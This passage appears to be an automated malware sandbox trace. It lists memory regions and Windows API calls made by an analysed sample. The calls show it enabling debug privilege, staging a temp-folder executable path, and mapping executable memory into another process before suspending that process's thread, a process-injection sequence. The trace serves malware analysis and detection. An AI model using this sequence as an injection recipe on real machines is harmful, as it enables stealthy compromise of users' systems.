entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 501 start_va = 0x30000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 502 start_va = 0x530000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 503 start_va = 0x8d0000 end_va = 0x9cdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 941 start_va = 0x560000 end_va = 0x573fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 942 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 943 start_va = 0x580000 end_va = 0x593fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 945 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 946 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 947 start_va = 0x5a0000 end_va = 0x5c9fff monitored = 0 entry_point = 0x5a5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 948 start_va = 0xce0000 end_va = 0xe67fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 949 start_va = 0xea0000 end_va = 0xeaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 950 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 951 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 952 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 953 start_va = 0xeb0000 end_va = 0x1030fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000eb0000" filename = "" Region: id = 954 start_va = 0x1040000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001040000" filename = "" Region: id = 976 start_va = 0xe70000 end_va = 0xe9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e70000" filename = "" Region: id = 978 start_va = 0x530000 end_va = 0x54dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Thread: id = 9 os_tid = 0xc88 [0099.909] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x19f23c | out: HeapArray=0x19f23c*=0x5d0000) returned 0x1 [0099.966] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x19f1ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0099.970] NtCreateFile (in: FileHandle=0x19f20c, DesiredAccess=0x120089, ObjectAttributes=0x19f1d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f1f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19f20c*=0x6c, IoStatusBlock=0x19f1f4*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0099.984] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5d2788) returned 1 [0099.990] NtQueryInformationFile (in: FileHandle=0x6c, IoStatusBlock=0x19f1f4, FileInformation=0x19f14c, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19f1f4, FileInformation=0x19f14c) returned 0x0 [0099.999] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1788a0) returned 0x6df020 [0100.037] NtReadFile (in: FileHandle=0x6c, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x19f1f4, Buffer=0x6df020, BufferLength=0x1784a0, ByteOffset=0x19f164*=0, Key=0x0 | out: IoStatusBlock=0x19f1f4, Buffer=0x6df020*) returned 0x0 [0100.041] NtClose (Handle=0x6c) returned 0x0 [0100.041] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x17b001) returned 0x862020 [0100.085] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x6df020) returned 1 [0100.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f1e0*=0x0, ZeroBits=0x0, RegionSize=0x19f1e4*=0x2f9522, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x19f1e0*=0x9e0000, RegionSize=0x19f1e4*=0x2fa000) returned 0x0 [0100.322] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1000) returned 0x5d33a0 [0100.323] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1000) returned 0x5d43a8 [0100.324] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1000) returned 0x5d53b0 [0100.324] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2000) returned 0x5d63b8 [0100.325] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5d53b0) returned 1 [0100.325] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x3000) returned 0x5d83c0 [0100.327] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5d63b8) returned 1 [0100.327] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4000) returned 0x5db3c8 [0100.328] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5d83c0) returned 1 [0100.328] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x5000) returned 0x5d53b0 [0100.329] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5db3c8) returned 1 [0100.329] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1000) returned 0x5da3b8 [0100.329] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2000) returned 0x5db3c0 [0100.335] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5da3b8) returned 1 [0100.505] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x3000) returned 0x5dd3c8 [0100.506] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5db3c0) returned 1 [0100.506] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4000) returned 0x5e03d0 [0100.507] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5dd3c8) returned 1 [0100.508] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x5000) returned 0x5da3b8 [0100.508] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5e03d0) returned 1 [0100.510] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1000) returned 0x5df3c0 [0100.510] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2000) returned 0x5e03c8 [0100.510] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5df3c0) returned 1 [0100.510] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x3000) returned 0x5e23d0 [0100.511] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5e03c8) returned 1 [0100.511] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4000) returned 0x5e53d8 [0100.512] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5e23d0) returned 1 [0100.513] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x5000) returned 0x5df3c0 [0100.513] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5e53d8) returned 1 [0100.514] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5d33a0) returned 1 [0100.514] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5d43a8) returned 1 [0100.515] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5d53b0) returned 1 [0100.515] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5da3b8) returned 1 [0100.516] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5df3c0) returned 1 [0100.558] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1000) returned 0x5d33a0 [0100.558] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1000) returned 0x5d43a8 [0100.558] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1000) returned 0x5d53b0 [0100.558] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2000) returned 0x5d63b8 [0100.559] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5d53b0) returned 1 [0100.560] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x3000) returned 0x5d83c0 [0100.561] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5d63b8) returned 1 [0100.562] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4000) returned 0x5db3c8 [0100.563] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5d83c0) returned 1 [0100.564] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x5000) returned 0x5d53b0 [0100.565] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5db3c8) returned 1 [0100.565] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1000) returned 0x5da3b8 [0100.565] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2000) returned 0x5db3c0 [0100.566] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5da3b8) returned 1 [0100.566] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x3000) returned 0x5dd3c8 [0100.567] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5db3c0) returned 1 [0100.567] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4000) returned 0x5e03d0 [0100.568] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5dd3c8) returned 1 [0100.568] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x5000) returned 0x5da3b8 [0100.568] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5e03d0) returned 1 [0100.568] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1000) returned 0x5df3c0 [0100.568] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2000) returned 0x5e03c8 [0100.569] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5df3c0) returned 1 [0100.569] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x3000) returned 0x5e23d0 [0100.570] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5e03c8) returned 1 [0100.570] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4000) returned 0x5e53d8 [0100.570] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5e23d0) returned 1 [0100.571] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x5000) returned 0x5df3c0 [0100.571] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5e53d8) returned 1 [0100.572] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5d33a0) returned 1 [0100.573] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5d43a8) returned 1 [0100.573] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5d53b0) returned 1 [0100.574] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5da3b8) returned 1 [0100.574] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5df3c0) returned 1 [0100.575] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x19f18c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0100.575] NtCreateFile (in: FileHandle=0x19f1ac, DesiredAccess=0x120089, ObjectAttributes=0x19f174*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f194, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19f1ac*=0x6c, IoStatusBlock=0x19f194*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0100.576] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5d2788) returned 1 [0100.576] NtQueryInformationFile (in: FileHandle=0x6c, IoStatusBlock=0x19f194, FileInformation=0x19ef08, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x19f194, FileInformation=0x19ef08) returned 0x0 [0100.576] NtClose (Handle=0x6c) returned 0x0 [0100.576] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x208) returned 0x5d33a0 [0100.576] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5d33a0) returned 1 [0100.587] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x5fa311d0, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f1c8, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f1c8*(BaseAddress=0x5fa31000, AllocationBase=0x5fa30000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0101.276] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0x19f220, Length=0x2, ResultLength=0x0 | out: SystemInformation=0x19f220, ResultLength=0x0) returned 0x0 [0101.300] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x19f244, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19f244, ReturnLength=0x0) returned 0x0 [0101.344] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x862020) returned 1 [0101.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19eed4*=0x0, ZeroBits=0x0, RegionSize=0x19eed8*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19eed4*=0x20000, RegionSize=0x19eed8*=0x10000) returned 0x0 [0101.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0xc0000004 [0101.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f234*=0x20000, RegionSize=0x19eef8, FreeType=0x8000) returned 0x0 [0101.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19eec0*=0x0, ZeroBits=0x0, RegionSize=0x19eec4*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19eec0*=0x20000, RegionSize=0x19eec4*=0x20000) returned 0x0 [0101.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x20000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x20000, ResultLength=0x0) returned 0x0 [0101.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f234*=0x20000, RegionSize=0x19f238, FreeType=0x8000) returned 0x0 [0101.424] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x19eff0 | out: Value="RDhJ0CNFevzX") returned 0x0 [0101.424] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32.dll", BaseAddress=0x19f060 | out: BaseAddress=0x19f060*=0x76b70000) returned 0x0 [0101.469] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x19f24c | out: TokenHandle=0x19f24c*=0x80) returned 0x0 [0101.476] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19f240 | out: lpLuid=0x19f240*(LowPart=0x14, HighPart=0)) returned 1 [0101.485] NtAdjustPrivilegesToken (in: TokenHandle=0x80, DisableAllPrivileges=0, NewState=0x19f23c, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x0 [0101.488] NtClose (Handle=0x80) returned 0x0 [0101.490] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x19e818 | out: Value="RDhJ0CNFevzX") returned 0x0 [0101.504] RtlSetEnvironmentVariable (in: Environment=0x0, Name="6NON26-3", Value="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rysgtozci.exe" | out: Environment=0x0) returned 0x0 [0101.508] NtCreateSection (in: SectionHandle=0x19ed18, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19eab8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19ed18*=0x80) returned 0x0 [0101.513] NtMapViewOfSection (in: SectionHandle=0x80, ProcessHandle=0xffffffff, BaseAddress=0x19ed1c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19eab8*=0x2e200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19ed1c*=0x1d0000, SectionOffset=0x0, ViewSize=0x19eab8*=0x2f000) returned 0x0 [0101.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e420*=0x0, ZeroBits=0x0, RegionSize=0x19e424*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19e420*=0x30000, RegionSize=0x19e424*=0x10000) returned 0x0 [0101.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x30000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x30000, ResultLength=0x0) returned 0xc0000004 [0101.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19eaac*=0x30000, RegionSize=0x19e444, FreeType=0x8000) returned 0x0 [0101.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e40c*=0x0, ZeroBits=0x0, RegionSize=0x19e410*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19e40c*=0x530000, RegionSize=0x19e410*=0x20000) returned 0x0 [0101.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x530000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x530000, ResultLength=0x0) returned 0x0 [0101.538] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea94*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea68*(UniqueProcess=0x748, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0xbc) returned 0x0 [0101.538] NtQueryInformationProcess (in: ProcessHandle=0xbc, ProcessInformationClass=0x1a, ProcessInformation=0x19e780, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19e780, ReturnLength=0x0) returned 0x0 [0101.538] NtCreateSection (in: SectionHandle=0x19e41c, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e3dc, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e41c*=0xc0) returned 0x0 [0101.539] NtMapViewOfSection (in: SectionHandle=0xc0, ProcessHandle=0xffffffff, BaseAddress=0x19e424*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e3dc*=0xfd200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e424*=0x8d0000, SectionOffset=0x0, ViewSize=0x19e3dc*=0xfe000) returned 0x0 [0101.546] NtMapViewOfSection (in: SectionHandle=0xc0, ProcessHandle=0xbc, BaseAddress=0x19e420*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e418*=0xfd200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e420*=0x7c60000, SectionOffset=0x0, ViewSize=0x19e418*=0xfe000) returned 0x0 [0104.793] NtClose (Handle=0xc0) returned 0x0 [0104.803] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x2000) returned 0x5da968 [0104.804] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19e0e8 | out: TokenHandle=0x19e0e8*=0xc0) returned 0x0 [0104.810] NtQueryInformationToken (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x19d8e0, TokenInformationLength=0x400, ReturnLength=0x19e0e0 | out: TokenInformation=0x19d8e0, ReturnLength=0x19e0e0) returned 0x0 [0104.813] ConvertSidToStringSidW (in: Sid=0x19d8e8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), StringSid=0x19e0e4 | out: StringSid=0x19e0e4*="S-1-5-21-1560258661-3990802383-1811730007-1000") returned 1 [0104.813] NtClose (Handle=0xc0) returned 0x0 [0104.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e358*=0x0, ZeroBits=0x0, RegionSize=0x19e35c*=0x13f56, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x19e358*=0x560000, RegionSize=0x19e35c*=0x14000) returned 0x0 [0104.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e344*=0x0, ZeroBits=0x0, RegionSize=0x19e348*=0x13f56, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x19e344*=0x580000, RegionSize=0x19e348*=0x14000) returned 0x0 [0104.836] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19e358*=0x41f296, NumberOfBytesToProtect=0x19e35c, NewAccessProtection=0x40, OldAccessProtection=0x19e3a4 | out: BaseAddress=0x19e358*=0x41f000, NumberOfBytesToProtect=0x19e35c, OldAccessProtection=0x19e3a4*=0x40) returned 0x0 [0104.837] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5da968) returned 1 [0104.852] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x19e150, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0104.856] NtCreateFile (in: FileHandle=0x19e170, DesiredAccess=0x120089, ObjectAttributes=0x19e138*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e158, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e170*=0xc0, IoStatusBlock=0x19e158*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0104.856] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5d8458) returned 1 [0104.872] NtQueryInformationFile (in: FileHandle=0xc0, IoStatusBlock=0x19e158, FileInformation=0x19decc, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0x19e158, FileInformation=0x19decc) returned 0x0 [0104.873] NtClose (Handle=0xc0) returned 0x0 [0104.873] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x208) returned 0x5d05c8 [0104.873] RtlFreeHeap (HeapHandle=0x5d0000, Flags=0x0, BaseAddress=0x5d05c8) returned 1 [0104.889] NtOpenProcess (in: ProcessHandle=0x19e358, DesiredAccess=0x438, ObjectAttributes=0x19d908*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19d948*(UniqueProcess=0x748, UniqueThread=0x0) | out: ProcessHandle=0x19e358*=0xc0) returned 0x0 [0104.894] NtQueryInformationProcess (in: ProcessHandle=0xc0, ProcessInformationClass=0x0, ProcessInformation=0x19d958, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x19d958, ReturnLength=0x0) returned 0x0 [0104.904] NtOpenThread (in: ThreadHandle=0x19d900, DesiredAccess=0x1a, ObjectAttributes=0x19d908, ClientId=0x19d938*(UniqueProcess=0x0, UniqueThread=0x74c) | out: ThreadHandle=0x19d900*=0xc4) returned 0x0 [0104.918] NtSuspendThread (in: ThreadHandle=0xc4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0104.953] NtGetContextThread (in: ThreadHandle=0xc4, Context=0x19de50 | out: Context=0x19de50*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xda, [65]=0x0, [66]=0x1, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0xdc, [73]=0x0, [74]=0x1, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x4, SegGs=0x0, SegFs=0x554310, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0xcedd0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0xffffffff, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0xec, [6]=0xc, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0xcb, [23]=0x82, [24]=0xf8, 